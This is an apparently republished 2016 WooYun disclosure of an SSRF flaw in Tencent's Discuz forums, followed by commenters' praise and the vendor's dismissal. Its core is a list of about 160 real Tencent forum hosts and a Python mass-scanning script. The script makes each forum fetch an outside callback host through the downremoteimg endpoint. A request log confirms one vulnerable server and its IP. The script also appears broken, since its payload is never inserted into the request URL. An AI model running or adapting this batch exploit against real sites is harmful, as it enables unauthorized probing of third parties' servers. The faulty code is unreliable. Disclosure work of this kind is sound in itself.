腾讯某论坛存在SSRF漏洞(附批量捡漏脚本)

admin
admin
admin
140559
文章
117
评论
2017年5月1日20:27:07评论356 views字数 218阅读0分43秒阅读模式
摘要

2016-06-12: 细节已通知厂商并且等待厂商处理中
2016-06-12: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-13: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(134) 关注此漏洞

缺陷编号: WooYun-2016-218421

漏洞标题: 腾讯某论坛存在SSRF漏洞(附批量捡漏脚本)

相关厂商: 腾讯

漏洞作者: 猪猪侠腾讯某论坛存在SSRF漏洞(附批量捡漏脚本)

提交时间: 2016-06-12 11:25

公开时间: 2016-06-13 17:23

漏洞类型: 未授权访问/权限绕过

危害等级: 中

自评Rank: 10

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

26人收藏

漏洞详情

披露状态:

2016-06-12: 细节已通知厂商并且等待厂商处理中
2016-06-12: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

批量跑一遍腾讯所有的论坛,论坛那么多,总能捡到一个漏掉的,充当案例

详细说明:

#1 先从搜索引擎和爬虫中找出腾讯使用了Discuz程序的服务器列表

code 区域 
http://fight.gamebbs.qq.com
 http://qqhx.gamebbs.qq.com
 http://bbs.digi.qq.com
 http://bbs.write.qq.com
 http://ff.gamebbs.qq.com
 http://bbs.baby.qq.com
 http://myhn.qq.com
 http://bbs.e.qq.com
 http://tpai.qq.com
 http://bbs.fanli.qq.com
 http://bbs.house.qq.com
 http://xia.gamebbs.qq.com
 http://bbs.cb.qq.com
 http://bbs.ac.qq.com
 http://club.auto.qq.com
 http://bbs.open.qq.com
 http://shouyou.qq.com
 http://bbs.im.qq.com
 http://qqbattle.gamebbs.qq.com
 http://nz.gamebbs.qq.com
 http://xx.gamebbs.qq.com
 http://xb.gamebbs.qq.com
 http://bbs.m.qq.com
 http://forum.discuz.qq.com
 http://bbs.cd.qq.com
 http://myln.qq.com
 http://ktv.gamebbs.qq.com
 http://gf.gamebbs.qq.com
 http://bbs.xian.qq.com
 http://gamebbs.qq.com
 http://ppjz.gamebbs.qq.com
 http://dm.gamebbs.qq.com
 http://ffo.gamebbs.qq.com
 http://sg.gamebbs.qq.com
 http://xb.qq.com
 http://bbs.zt.qq.com
 http://mygd.qq.com
 http://xj.gamebbs.qq.com
 http://xb.qq.com:8080
 http://bbs.gj.qq.com
 http://bbs.vip.qq.com
 http://bbs.sports.qq.com
 http://bbs.weiqi.qq.com
 http://lol.gamebbs.qq.com
 http://bbs.finance.qq.com
 http://d2.gamebbs.qq.com
 http://fs.gamebbs.qq.com
 http://myfj.qq.com
 http://mysh.qq.com
 http://ch.gamebbs.qq.com
 http://qqxy.gamebbs.qq.com
 http://codol.gamebbs.qq.com
 http://ava.gamebbs.qq.com
 http://fo.gamebbs.qq.com
 http://bbs.lol.qq.com
 http://wang.gamebbs.qq.com
 http://bbs.games.qq.com
 http://bbs.omd.qq.com
 http://tps.gamebbs.qq.com
 http://tiantang2.gamebbs.qq.com
 http://qqgame.gamebbs.qq.com
 http://bbs.yun.qq.com
 http://yl.gamebbs.qq.com
 http://bbs.wifi.qq.com
 http://bns.gamebbs.qq.com
 http://nba2k.gamebbs.qq.com
 http://bbs.blog.qq.com
 http://r2.gamebbs.qq.com
 http://bbs.open.t.qq.com
 http://ld2.gamebbs.qq.com
 http://yu.gamebbs.qq.com
 http://qgamepailei.gamebbs.qq.com
 http://hao.wsq.qq.com
 http://c9.gamebbs.qq.com
 http://ss.gamebbs.qq.com
 http://hxsj.gamebbs.qq.com
 http://bbs.xg.qq.com
 http://x52.gamebbs.qq.com
 http://bbs.book.qq.com
 http://9j.gamebbs.qq.com
 http://speed.gamebbs.qq.com
 http://djt.qq.com
 http://qyzs.gamebbs.qq.com
 http://bbs.auto.qq.com
 http://myhb.qq.com
 http://code.qq.com
 http://bbs.tech.qq.com
 http://wf.gamebbs.qq.com
 http://daoju.gamebbs.qq.com
 http://qqbaby.gamebbs.qq.com
 http://dzs.gamebbs.qq.com
 http://bbs.lady.qq.com
 http://bbs.kid.qq.com
 http://bbs.browser.qq.com
 http://dnf.gamebbs.qq.com
 http://s3.gamebbs.qq.com
 http://sl.gamebbs.qq.com
 http://woz.gamebbs.qq.com
 http://bbs.edu.qq.com
 http://bbs.fj.qq.com
 http://qqtang.gamebbs.qq.com
 http://xxz.gamebbs.qq.com
 http://bbs.pcmgr.qq.com
 http://myxian.qq.com
 http://xiaoyuan.qq.com
 http://mycd.qq.com
 http://cf.gamebbs.qq.com
 http://ug.qq.com
 http://myzj.qq.com
 http://bbs.meishi.qq.com
 http://bbs.astro.qq.com
 http://7.gamebbs.qq.com
 http://3366.gamebbs.qq.com
 http://meng.gamebbs.qq.com
 http://baoshi.gamebbs.qq.com
 http://bbs.guanjia.qq.com
 http://mo.gamebbs.qq.com
 http://bbs.cf.qq.com
 http://bbs.gd.qq.com
 http://bbs.comic.qq.com
 http://vr.qq.com
 http://mycq.qq.com
 http://tiantang.gamebbs.qq.com
 http://bbs.map.qq.com
 http://cheng.gamebbs.qq.com
 http://tnt.gamebbs.qq.com
 http://myhenan.qq.com
 http://xy.gamebbs.qq.com
 http://h2.gamebbs.qq.com
 http://bbs.show.qq.com
 http://bbs.wan.qq.com
 http://bbs.ent.qq.com
 http://qqsh.gamebbs.qq.com
 http://mama.kid.qq.com
 http://bbs.cq.qq.com
 http://bbs.qt.qq.com
 http://age.gamebbs.qq.com
 http://bbs.fashion.qq.com
 http://bbs.v.qq.com
 http://bbs.mail.qq.com
 http://bbs.ms.qq.com
 http://pet.gamebbs.qq.com
 http://bl.gamebbs.qq.com
 http://bbs.hb.qq.com
 http://x.gamebbs.qq.com
 http://bbs.tgp.qq.com
 http://hon.gamebbs.qq.com
 http://jh.gamebbs.qq.com
 http://zg.gamebbs.qq.com
 https://xb.qq.com
 http://9.gamebbs.qq.com
 http://bbs.shang.qq.com
 http://ye.gamebbs.qq.com
 http://bbs.news.qq.com
 http://bbs.qa.qq.com
 http://bbs.chuangshi.qq.com
 http://x5.gamebbs.qq.com

#2 建立批量检测脚本捡漏

code 区域 
#!/usr/bin/env python
 # encoding: utf-8
 
 import urlparse
 import random
 import time
 import re
 
 import requests
 from utils.fileutils import FileUtils
 
 import requests.packages.urllib3
 requests.packages.urllib3.disable_warnings()
 
 for website in FileUtils.getLines('qqdz.lst'):
     request = requests.session()
     try:
         forumurl = "{website}/forum.php".format(website=website)
         response = request.get(forumurl, timeout=5, verify=False)
         formhash = re.findall(r'formhash" value="(.*?)"',response.content)
         netloc = urlparse.urlparse(website).netloc
         payload = 'http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(netloc=netloc)
         url = "{website}/forum.php?mod=ajax&action=downremoteimg&formhash={formhash}&message=".format(
             website=website,
             formhash=formhash[0] if formhash else '',
             payload=payload)
         response = request.get(url, timeout=5, verify=False)
         print url, len(response.content)
     except Exception, e:
         print website, e

上面的 fileutils 库在这里

http://fuzz.wuyun.org/src/fileutils.py

漏洞证明:

#3 批量跑一边,在fuzz.wuyun.com的httpd查看请求日志

code 区域 
119.29.69.176 - - [12/Jun/2016:11:00:45 +0800] "GET /404.php?s=vr.qq.com.jpg HTTP/1.1" 404 282 "-" "-"

#4 捡到一个漏打补丁的论坛

http://vr.qq.com/forum.php

code 区域 
IP:119.29.69.176
 广东省广州市 腾讯云计算(北京)有限责任公司 腾讯集团

修复方案:

# 论坛那么多,总有漏掉的案例

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-13 17:23

厂商回复:

非常感谢您的报告,经评估该站点已有网络隔离,无法访问公司IDC内网,故此忽略。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-06-12 11:28 | 荒废的腰子 ( 普通白帽子 | Rank:264 漏洞数:31 | bug is my best friend)

    0

    dz

  2. 2016-06-12 11:29 | jye33 ( 普通白帽子 | Rank:1340 漏洞数:310 | 没有什么能够阻挡,我对静静的向往)

    3

    66666

  3. 2016-06-12 11:48 | 石家庄 ( 实习白帽子 | Rank:44 漏洞数:14 | 同上)

    0

    2333

  4. 2016-06-12 12:02 | Raven ( 路人 | Rank:8 漏洞数:3 | 转让一张白帽场门票= =)

    0

    好厉害啊!

  5. 2016-06-12 12:18 | heartk ( 普通白帽子 | Rank:208 漏洞数:55 | 保存心中那份热情,坚持心中那份梦想。)

    0

    666666

  6. 2016-06-12 12:43 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    0

    666666

  7. 2016-06-12 13:31 | Submit ( 普通白帽子 | Rank:565 漏洞数:132 | )

    0

    此漏洞已有人在SRC提交过,故此忽略

  8. 2016-06-12 14:00 | hkAssassin ( 普通白帽子 | Rank:395 漏洞数:73 | 我是一只毛毛虫。)

    0

    一言不和就发ssrf

  9. 2016-06-12 14:21 | Explo1t ( 路人 | Rank:16 漏洞数:8 | 流生若川,不要小看人生啊!)

    0

    马克,

  10. 2016-06-12 14:30 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习,多挖洞!)

    0

    一言不和就发车。 老司机,带上我。

  11. 2016-06-12 14:44 | Mel0d6y ( 实习白帽子 | Rank:77 漏洞数:15 | 迷失在未来的旅行者. 「H...)

    0

    我猪今年峰会上的案例集收集的差不多了吧?

  12. 2016-06-12 15:45 | YiYang ( 实习白帽子 | Rank:57 漏洞数:22 | 一锹、两锹、三锹。。。)

    0

    多发点批量检测脚本,好学习,多谢分享。

  13. 2016-06-12 16:42 | Fvckyou ( 路人 | Rank:16 漏洞数:3 )

    0

    此漏洞已有人在SRC提交过,故此忽略

  14. 2016-06-12 17:00 | 乱舞 ( 路人 | Rank:20 漏洞数:7 | 小小白)

    0

    猪哥威武

  15. 2016-06-12 17:41 | NeverEnd ( 普通白帽子 | Rank:106 漏洞数:35 | hack)

    0

    nice

  16. 2016-06-12 17:58 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

    0

    脚本!

  17. 2016-06-12 18:22 | Rainism ( 路人 | Rank:15 漏洞数:4 | hacking for fun)

    0

    案例丰富

  18. 2016-06-12 22:35 | xinali ( 路人 | Rank:11 漏洞数:1 | 在校学生,研究网络安全,希望毕业可以找到...)

    0

    mark

  19. 2016-06-14 12:53 | 放开那个大婶 ( 路人 | Rank:16 漏洞数:6 | 好好学习,天天向上)

    0

    哎 漏洞审核是不是要看人

  20. 2016-06-14 16:14 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    0

    谢谢猪哥的Fuzz字典包,好全!!

  21. 2016-06-14 22:15 | 天下第一高手阿秀 ( 路人 | Rank:6 漏洞数:4 | 能让内心保持宁静的人,才是最有力量的。)

    0

    厉害,严谨!

  22. 2016-06-15 23:25 | heartk ( 普通白帽子 | Rank:208 漏洞数:55 | 保存心中那份热情,坚持心中那份梦想。)

    0

    忽略了。。。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin